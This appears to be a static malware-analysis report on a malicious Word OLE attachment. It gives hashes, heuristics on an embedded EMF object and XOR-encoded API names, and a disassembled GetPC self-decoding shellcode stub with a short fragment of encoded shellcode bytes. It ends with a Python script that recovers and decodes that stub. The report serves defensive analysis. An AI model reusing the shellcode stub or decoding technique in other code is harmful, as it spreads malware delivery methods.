Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0d34392d467ac336…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 69.0 KB
Created: 2006-01-25 08:30:00
Authoring application: Microsoft Office Word
First seen: 2015-10-01
MD5: d1e87ebd34743264c1edae5f437a66b0
SHA-1: 2bf9670a6cdec9e419e3496c0737af1052031dfe
SHA-256: 0d34392d467ac336684da04fb95f8ce0c0fbc323ecdee2c5209ecddf3dfe5476
Risk score: 140

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment

The sample is an OLE document whose ObjectPool carries an embedded object (the OLE_EPRINT_EMF_OBJECT heuristic). The document body is in Chinese and reads as a report on building test files, plausibly a lure that gives the reader a reason to open the document and interact with the embedded object. The XOR-encoded API names and the GetPC stub are the marks of position-independent, self-decoding shellcode rather than of a benign document. Note that the two XOR findings use different keys: the API names are encoded with 0xFF, while the decoder loop in the GetPC stub uses 0xEC, so there are either two separately encoded regions or two layers of encoding. Without further script or URL analysis, the exact payload and family remain unknown.

Heuristics (3)

  • Office EPRINT stream contains EMF object (severity: high; tag: CVE related; rule: OLE_EPRINT_EMF_OBJECT)
    The OLE ObjectPool contains an EPRINT stream carrying EMF data. This is rare in normal documents and, paired with the shellcode anomalies below, is evidence of object-based delivery through Office; the malformed graphics record that would be needed for an exact CVE attribution is not established by this rule alone.
  • XOR-encoded strings (key 0xFF) (severity: critical; rule: SC_XOR_ENCODED)
    Found 3 Windows library/API names XOR-encoded with the single-byte key 0xFF: 'CreateProcessA', 'ExitProcess', 'CreateFileA'.
    Disassembly hidden: these bytes score as degenerate rather than as coherent x86 code (the single mnemonic 'add' makes up 89% of the instructions, i.e. a sled or padding/filler run, not program logic).
  • x86 GetPC stub (CALL $+5; POP EBX) (severity: high; rule: SC_GETPC_CALL)
    The stub at 0xB11 recovers its own address (CALL $+5 pushes 0xB16, which POP EBX loads), adds 0x1A to reach 0xB30, and then XORs 0x2B0 (688) bytes in place with the key 0xEC before jumping to the decoded region at 0xB30. That start address matches the point where the listing stops being coherent: everything from 0xB30 onward is the still-encoded body, so the 'in al, dx' and similar instructions below it are artefacts of disassembling ciphertext, not program logic. The 'jmp 0xb11' at 0xB2E is skipped over by the preceding 'jmp 0xb30' and never executes.
    Disassembly
    x86 disassembly · validity: uncertain (0.584); 5/5 branch targets land on an instruction boundary (100% coherence)
    00000B11  e800000000        call 0xb16
    00000B16  5b                pop ebx
    00000B17  b9b0020000        mov ecx, 0x2b0
    00000B1C  81c31a000000      add ebx, 0x1a
    00000B22  8a33              mov dh, byte ptr [ebx]
    00000B24  80f6ec            xor dh, 0xec
    00000B27  8833              mov byte ptr [ebx], dh
    00000B29  43                inc ebx
    00000B2A  e2f6              loop 0xb22
    00000B2C  eb02              jmp 0xb30
    00000B2E  ebe1              jmp 0xb11
    00000B30  884ddc            mov byte ptr [ebp - 0x24], cl
    00000B33  ec                in al, dx
    00000B34  ec                in al, dx
    00000B35  ec                in al, dx
    00000B36  67ac              lodsb al, byte ptr [si]
    00000B38  e067              loopne 0xba1
    00000B3A  9c                pushfd
    00000B3B  f0                .byte 0xf0
    00000B3C  41                inc ecx
    00000B3D  679c              pushfd
    00000B3F  e405              in al, 5
    00000B41  86ee              xchg dh, ch
    00000B43  ec                in al, dx
    00000B44  ec                in al, dx
    00000B45  b46d              mov ah, 0x6d
    00000B47  00ec              add ah, ch
    00000B49  ee                out dx, al
    00000B4A  ec                in al, dx
    00000B4B  ec                in al, dx
    00000B4C  671067f4          adc byte ptr [bx - 0xc], ah
    00000B50  65b3e8            mov bl, 0xe8
    00000B53  659b              wait
    00000B55  e46f              in al, 0x6f
    00000B57  2ce8              sub al, 0xe8
    00000B59  65ab              stosd dword ptr es:[edi], eax
    00000B5B  e06f              loopne 0xbcc
    00000B5D  2ce0              sub al, 0xe0
    00000B5F  65ab              stosd dword ptr es:[edi], eax
    00000B61  fc                cld
    00000B62  6f                outsd dx, dword ptr [esi]
    00000B63  2cfe              sub al, 0xfe
    00000B65  656b6cececec      imul ebp, dword ptr gs:[esp + ebp*8 - 0x14], -0x14
    00000B6B  bb67106d1b        mov ebx, 0x1b6d1067
    00000B70  13                .byte 0x13
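The two shellcode heuristics above (SC_XOR_ENCODED and SC_GETPC_CALL) can both be checked by hand. The script below is an added example, not part of this report or of the scanner that produced it: it brute-forces the single-byte XOR key over a blob and lists the API names that appear under each key, and it parses the GetPC stub exactly as listed in the disassembly, recovers the loop parameters (counter, skip, key) and runs the same loop over the bytes that follow the stub. The stub and body bytes are transcribed from the listing (0xB11 to 0xB70); the blob used for the API-name scan is constructed here for illustration, and the two extra API names in API_NAMES are an assumption, not findings from the report.

```python
"""Added example (not part of the report or the scanner that produced it).

Two checks an analyst would run by hand on the evidence above:
  1. brute-force the single-byte XOR key over a blob and report which
     Windows API names appear under it (the SC_XOR_ENCODED hit reports
     key 0xFF);
  2. pull the loop parameters out of the GetPC stub shown in the
     SC_GETPC_CALL disassembly and run the same loop over the bytes that
     follow it.
The stub bytes are transcribed from the disassembly listing; the blob used
for the API-name scan is constructed here for illustration.
"""
import re
import struct

# Names worth looking for: the three reported by the heuristic plus two that
# import-less shellcode almost always resolves (assumption, not from the report).
API_NAMES = [b"CreateProcessA", b"ExitProcess", b"CreateFileA",
             b"LoadLibraryA", b"GetProcAddress"]


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key (what the loop at 0xB22 does in place)."""
    return bytes(b ^ key for b in data)


def find_xor_encoded_apis(blob: bytes, names=API_NAMES) -> dict:
    """Return {key: [api, ...]} for every single-byte key under which at least one
    API name appears in the decoded blob.  Key 0x00 is skipped: a plaintext hit
    is an import, not obfuscation."""
    hits = {}
    for key in range(1, 256):
        decoded = xor_bytes(blob, key)
        found = [n.decode() for n in names if n in decoded]
        if found:
            hits[key] = found
    return hits


# Bytes 0xB11..0xB70 as listed in the report's disassembly: 31 bytes of stub,
# then the first 65 bytes of the still-encoded body.
STUB_BASE = 0xB11
STUB = bytes.fromhex(
    "e800000000" "5b" "b9b0020000" "81c31a000000"        # call $+5; pop ebx; mov ecx; add ebx
    "8a33" "80f6ec" "8833" "43" "e2f6"                    # decode loop
    "eb02" "ebe1"                                         # jmp 0xb30; (skipped) jmp 0xb11
    "884ddc" "ec" "ec" "ec" "67ac" "e067" "9c" "f0" "41" "679c"
    "e405" "86ee" "ec" "ec" "b46d" "00ec" "ee" "ec" "ec"
    "671067f4" "65b3e8" "659b" "e46f" "2ce8" "65ab" "e06f" "2ce0" "65ab"
    "fc" "6f" "2cfe" "656b6cececec" "bb67106d1b" "13"
)

# The exact stub shape from the listing.  Named groups capture the loop
# counter, the offset added to the popped address, and the XOR key.
STUB_PATTERN = re.compile(
    rb"\xe8\x00\x00\x00\x00"      # call $+5        (pushes the address of the next insn)
    rb"\x5b"                      # pop ebx         (ebx = that address)
    rb"\xb9(?P<count>.{4})"       # mov ecx, imm32  (byte count)
    rb"\x81\xc3(?P<skip>.{4})"    # add ebx, imm32  (skip forward to the encoded body)
    rb"\x8a\x33"                  # mov dh, [ebx]
    rb"\x80\xf6(?P<key>.)"        # xor dh, imm8    (the key)
    rb"\x88\x33"                  # mov [ebx], dh
    rb"\x43"                      # inc ebx
    rb"\xe2.",                    # loop rel8
    re.DOTALL,
)


def parse_getpc_decoder(blob: bytes, base: int):
    """Locate the stub and return its parameters, or None if it is not present."""
    m = STUB_PATTERN.search(blob)
    if m is None:
        return None
    pop_value = base + m.start() + 5          # what `pop ebx` loads: the address after the call
    return {
        "stub_va": base + m.start(),
        "count": struct.unpack("<I", m.group("count"))[0],
        "key": m.group("key")[0],
        "body_va": pop_value + struct.unpack("<I", m.group("skip"))[0],
    }


def emulate_decoder(blob: bytes, base: int):
    """Run the stub's loop over the blob.  Returns (params, decoded_body); the body
    is cut short when the blob carries fewer than `count` bytes past body_va."""
    params = parse_getpc_decoder(blob, base)
    if params is None:
        return None, b""
    start = params["body_va"] - base
    end = min(start + params["count"], len(blob))
    return params, xor_bytes(blob[start:end], params["key"])


if __name__ == "__main__":
    # Constructed sample: the three reported names, XORed with 0xFF, between zero padding.
    sample = (b"\x00" * 16
              + xor_bytes(b"CreateProcessA\x00ExitProcess\x00CreateFileA\x00", 0xFF)
              + b"\x00" * 16)
    for key, names in find_xor_encoded_apis(sample).items():
        print(f"key 0x{key:02x}: {', '.join(names)}")

    params, body = emulate_decoder(STUB, STUB_BASE)
    print({k: hex(v) for k, v in params.items()})
    print(body[:16].hex())
```

Run against the transcribed bytes, the parser returns count 0x2B0, key 0xEC and a body start of 0xB30, matching the reading given above, and the first 16 decoded bytes are 64 a1 30 00 00 00 8b 40 0c 8b 70 1c ad 8b 70 08, which disassemble to mov eax, fs:[0x30]; mov eax, [eax+0xc]; mov esi, [eax+0x1c]; lodsd; mov esi, [eax+8]: the classic PEB and loader-list walk that import-less shellcode uses to find a module base. Only 65 of the 688 encoded bytes appear in the listing, so the full body has to be decoded from the file itself at 0xB30; the API names reported under key 0xFF are a separate finding and will not turn up under the 0xEC decode of this region.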